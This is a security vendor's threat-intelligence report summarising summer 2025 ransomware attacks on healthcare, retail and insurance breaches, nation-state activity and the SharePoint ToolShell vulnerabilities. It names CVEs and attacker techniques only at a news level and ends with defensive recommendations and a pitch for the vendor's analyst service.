The Summer 2025 Cyber Wildfires: An Analysis of Ransomware, Data Breaches, and Nation-State Attacks

Report: The Heat Wasn’t Just Outside; Cyber Attacks Spiked in Summer 2025

Summer 2025 was a season of unprecedented cyberattacks. Ransomware hammered hospitals, retail giants suffered data breaches, insurance firms were hit by phishing, and nation-state actors launched disruptive campaigns. From stealthy PowerShell loaders to zero-day SharePoint exploits, attackers kept defenders on their heels. This report breaks down the season’s most high-impact incidents and what security teams need to do before the next wave hits.

---

Summer Exposes Healthcare’s Growing Ransomware Risk

Hospitals can’t afford downtime, and attackers know it. This summer, ransomware groups targeted healthcare, exploiting both the value of patient data and the urgency of care.

• Interlock Rises as a Major Threat to US Healthcare: A July 22, 2025, joint advisory by CISA, the FBI, and HHS highlighted Interlock as a major threat to the Healthcare and Public Health (HPH) sector. The group is linked to around 14 incidents in 2025 alone, with a third affecting only healthcare providers. What sets Interlock apart is its use of “FileFix,” a PowerShell launcher that hides malicious scripts behind decoy file paths. It tricks users into running payloads through File Explorer, bypassing typical security detections. The advisory noted the group’s TTPs included drive-by downloads, leveraging tools like Cobalt Strike, and an unusual ransom process that forces victims to initiate contact.
• Rhysida Ransomware Targeted Another US Healthcare Center: On July 8, 2025, the Rhysida ransomware group allegedly leaked sensitive data from Florida Hand Center, including medical images, driver’s licenses, and insurance forms. The clinic was given just seven days to respond before the release.
• Qilin Recycles Scattered Spider Playbook in Wave of Healthcare Breaches: In June 2025, Qilin became the most active ransomware group, recording 81 victims, 52 of them in the healthcare sector. The group exploited unpatched Fortinet vulnerabilities (CVE-2024-21762 and CVE-2024-55591) to gain access, deploy ransomware, and exfiltrate sensitive data such as EHRs and insurance records. To maximize pressure, Qilin leveraged legal-themed extortion tactics, like a “Call Lawyer” feature and automated negotiation tools to drive faster payouts. The attack highlights the severe financial and legal implications of a data breach under HIPAA and other state-specific data protection laws.

---

Major Brands Breached in Retail Cybercrime Wave

The retail sector couldn’t escape the wave of cyberattacks sweeping through Summer 2025.

• Louis Vuitton Breach Marks Third in a Quarter: On July 2, 2025, Louis Vuitton UK suffered a data breach exposing customer contact info and purchase history. This was its third LVMH brand breach in three months after Dior and LV Korea. Days later, on July 10, UK police arrested four suspects tied to high-profile attacks on M&S, Co-op, and Harrods. The group is allegedly linked to Scattered Spider, a domestic threat actor known for social engineering and collaboration with ransomware operators like DragonForce, signaling the growing impact of homegrown cybercriminals on major retailers.
• DragonForce Hits US Retail Chain Belk: Between May 7 and 11, 2025, on the other side of the Atlantic, North Carolina-based retailer Belk suffered a data breach. DragonForce claimed responsibility, stating it exfiltrated 156 GB of customer and employee data, including names, Social Security numbers, emails, and HR files, which were later posted on its leak site after ransom negotiations stalled.
• Scattered Spider’s Tactics Shifted from Retail to Insurance: Scattered Spider (UNC3944), a native English-speaking cybercriminal collective, used identity-centric social engineering, voice phishing, MFA fatigue, and help-desk impersonation to breach UK retailers (M&S, Co-op, Harrods) in April–May 2025. In mid-June 2025, the group shifted to targeting US insurance firms. Aflac detected and contained unauthorized access on June 12, 2025, with customer and employee personal data (SSNs, health claims) allegedly compromised. Erie Insurance and Philadelphia Insurance Companies also reported similar cyber disruptions, highlighting the industry’s vulnerability to identity-centric attacks. These incidents underscore the importance of complying with laws like the CCPA and industry regulations from the National Association of Insurance Commissioners (NAIC).

---

State-Sponsored and Geopolitical Cyber Activity

Not all cyber threats this summer were about money. Nation-state hackers and hacktivists also made their mark, using the turbulent geopolitical climate to launch attacks.

• Pro-Israel Hacktivist Group Predatory Sparrow Hits Iran: On June 14–17, 2025, pro-Israel hacktivist group Predatory Sparrow hit Iran’s Bank Sepah, disrupting banking services. The group then claimed to destroy ~$90M in crypto by breaching Nobitex and sending tokens to burn wallets.
• Iran Threatens Cyber Retaliation: On June 30, 2025, the US Department of Homeland Security and CISA issued a joint alert warning of impending Iranian cyber retaliation targeting critical infrastructure in the US and Europe. These incidents serve as a stark reminder that cyber conflict is now a frontline extension of geopolitical tension, one that can ripple far beyond borders and sectors.

---

Key Vulnerabilities Gaining Public Attention

Multiple Microsoft SharePoint vulnerabilities were exploited this summer in a widespread cyber espionage campaign known as ToolShell.

• CVE-2025-53770 is a critical remote code execution (RCE) flaw allowing unauthenticated attackers to run arbitrary code on vulnerable on-prem SharePoint servers. Threat actors used it to deploy web shells, steal credentials, and move laterally through enterprise networks. CISA added the bug to its KEV catalog on July 20, 2025.
• CVE-2025-49704 and CVE-2025-49706 were also added to the KEV after being abused in chained attacks. The pair enables authentication bypass and code injection, allowing attackers to exploit unpatched SharePoint systems even if earlier fixes were applied.
• The ToolShell campaign targeted organizations across the US, Europe, and the Middle East, including government agencies, energy firms, and telecom providers. Security researchers say the attackers likely reverse-engineered Microsoft’s July Patch Tuesday fixes to develop the bypass used in CVE-2025-53770.

---

What to Take from the Summer Wildfires in Cybersecurity?

From hospitals to retail giants and insurance providers to nation-states, the season exposed cracks in even the most fortified environments. Here’s what security teams should do next.

• Patch Like Your Life Depends on It: Start with CISA KEV entries and high-severity CVEs, but don’t stop there. Validate whether each CVE is actually exploitable in your environment and focus on exploit chains, not just individual scores.
• Harden Identity as Your New Perimeter: Social engineering worked better than malware this summer. Stop MFA fatigue attacks, reinforce help-desk verification, and limit privileged access.
• Train Your Humans: Run regular simulations, update phishing scenarios, and prepare high-risk roles for real-world lures. Threat actors like Scattered Spider didn’t exploit a CVE; they exploited a person.
• Watch for Post-Initial Access Activity: Threat actors like Interlock and Qilin didn’t just drop ransomware; they moved laterally, staged data, and evaded detection. Implement behavioral monitoring for techniques such as PowerShell abuse, credential theft, and stealthy data exfiltration.
• Don’t Ignore Legacy Systems: The ToolShell campaign exploited unpatched on-prem SharePoint servers, many running unsupported or outdated versions. Isolate what you can’t upgrade, monitor what you can’t patch, and replace what you’ve ignored.

---

Need Further Assistance?

If you have any further questions regarding this critical report, suspect your organization’s sensitive information may be compromised, or require advanced cyber threat intelligence and dark web monitoring services, you are encouraged to use the ‘Ask to Analyst’ feature to consult with a real expert, contact Brinztech directly, or, if you find the information irrelevant, open a support ticket for additional assistance.